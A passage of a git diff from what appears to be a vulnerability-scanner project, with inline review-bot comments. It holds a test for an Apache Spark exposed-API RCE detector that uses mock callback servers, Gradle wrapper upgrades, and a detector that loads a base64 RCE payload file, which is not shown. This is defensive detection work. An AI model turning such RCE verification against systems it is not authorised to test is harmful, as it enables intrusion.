JsonFormat.printer().preservingProtoFieldNames().print(log); + mockCallbackServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setHeader(CONTENT_TYPE, MediaType.PLAIN_TEXT_UTF_8.toString()) + .setBody(body)); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_Api")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "Exposed Apache Spark API which allows unauthenticated RCE detected.") + .setDescription( + "An exposed Apache Spark API allows an unauthenticated attacker to" + + " submit a malicious task. If an Apache Spark worker processes" + + " such a task, it loads and executes attacker-controlled content" + + " from an external resource. 
This allows an attacker to execute" + + " arbitrary Java Code within the context of the worker node.") + .setRecommendation( + "Don't expose the Apache Spark API to unauthenticated attackers.")) + .build()); + } + + @Test + public void detect_ifNotVulnerable_doNotReportsVuln() throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code())); + mockWebServer.start(); + mockWebServer.url(ApacheSparksExposedApiVulnDetector.VULNERABLE_PATH); + // 404 NOT_FOUND means no valid oob logs for mockCallbackServer + mockCallbackServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.NOT_FOUND.code()) + .setHeader(CONTENT_TYPE, MediaType.PLAIN_TEXT_UTF_8.toString())); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} diff --git a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties 
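Review bot: `detect_ifNotVulnerable_doNotReportsVuln` never reaches the callback check. It enqueues a 200 with no body on `mockWebServer`, so the detector shown earlier in this diff presumably fails the `VULNERABILITY_RESPONSE_PATTERN` match (the pattern is defined outside the visible lines) and returns false before `payload.checkIfExecuted()` runs, leaving the queued 404 on `mockCallbackServer` unused. The case that guards against false positives is therefore untested: the target returns the "Driver successfully submitted" message but no out-of-band interaction is recorded. A third test like the one below would cover it. Any test reaching that branch also pays the detector's fixed 10-second `sleepUninterruptibly`, so making that delay injectable is worth considering.

```java
@Test
public void detect_ifSubmissionAcceptedButNoCallback_doesNotReportVuln() throws IOException {
  // Target answers like a vulnerable server, but the callback server records no interaction.
  mockWebServer.enqueue(
      new MockResponse()
          .setResponseCode(HttpStatus.OK.code())
          .setBody(" \"message\" : \"Driver successfully submitted as"));
  mockWebServer.start();
  mockCallbackServer.enqueue(
      new MockResponse()
          .setResponseCode(HttpStatus.NOT_FOUND.code())
          .setHeader(CONTENT_TYPE, MediaType.PLAIN_TEXT_UTF_8.toString()));
  // … unchanged: NetworkService construction and detector.detect(...) call as in the existing tests …
  assertThat(detectionReports.getDetectionReportsList()).isEmpty();
}
```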
+++ b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/rce/cve202135464/gradlew b/community/detectors/rce/cve202135464/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/rce/cve202135464/gradlew +++ b/community/detectors/rce/cve202135464/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
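Review bot: Nothing in this hunk pins the downloaded distribution. `distributionUrl` moves to gradle-7.0 and `gradle-wrapper.jar` is replaced as an opaque binary in the same commit, but there is no `distributionSha256Sum` entry. Neither `networkTimeout` nor `validateDistributionUrl` verifies the archive contents. Consider adding `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip>` (placeholder; take the value from Gradle's published checksums) here and in the identical hunk for `spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties`. The replaced wrapper jar should also be checked against the published checksum for the Gradle release that generated it.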
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/rce/cve202135464/gradlew.bat b/community/detectors/rce/cve202135464/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/rce/cve202135464/gradlew.bat +++ b/community/detectors/rce/cve202135464/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java b/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java index 32e197fc6..7a06d32ef 100644 --- a/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java +++ b/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java 
@@ -18,9 +18,9 @@ import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.tsunami.common.net.http.HttpRequest.get; +import static java.nio.charset.StandardCharsets.UTF_8; import com.google.common.base.Ascii; -import com.google.common.base.Charsets; import com.google.common.base.Stopwatch; import com.google.common.base.Ticker; import com.google.common.collect.ImmutableList; @@ -45,6 +45,7 @@ import com.google.tsunami.proto.Vulnerability; import com.google.tsunami.proto.VulnerabilityId; import java.io.IOException; +import java.nio.charset.StandardCharsets; import java.time.Clock; import java.time.Instant; import javax.inject.Inject; @@ -79,7 +80,7 @@ public final class Cve202135464Detector implements VulnDetector { this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); try { this.serializedBase64RCEPayload = - Resources.toString(Resources.getResource(this.getClass(), "payload.b64"), Charsets.UTF_8); + Resources.toString(Resources.getResource(this.getClass(), "payload.b64"), UTF_8); } catch (IOException e) { logger.atSevere().withCause(e).log( "Should never happen. Couldn't load payload resource file."); diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 
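Review bot: The `import java.nio.charset.StandardCharsets;` added in the second hunk looks redundant. The only charset use visible in this diff is the `Resources.toString(..., UTF_8)` call in the third hunk, and that resolves through the new static import `java.nio.charset.StandardCharsets.UTF_8`. Unless `StandardCharsets` is referenced elsewhere in the file (not visible here), drop the plain import to avoid an unused-import warning. The constructor containing the `Resources.toString` call starts and ends outside the hunk.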
--- a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if 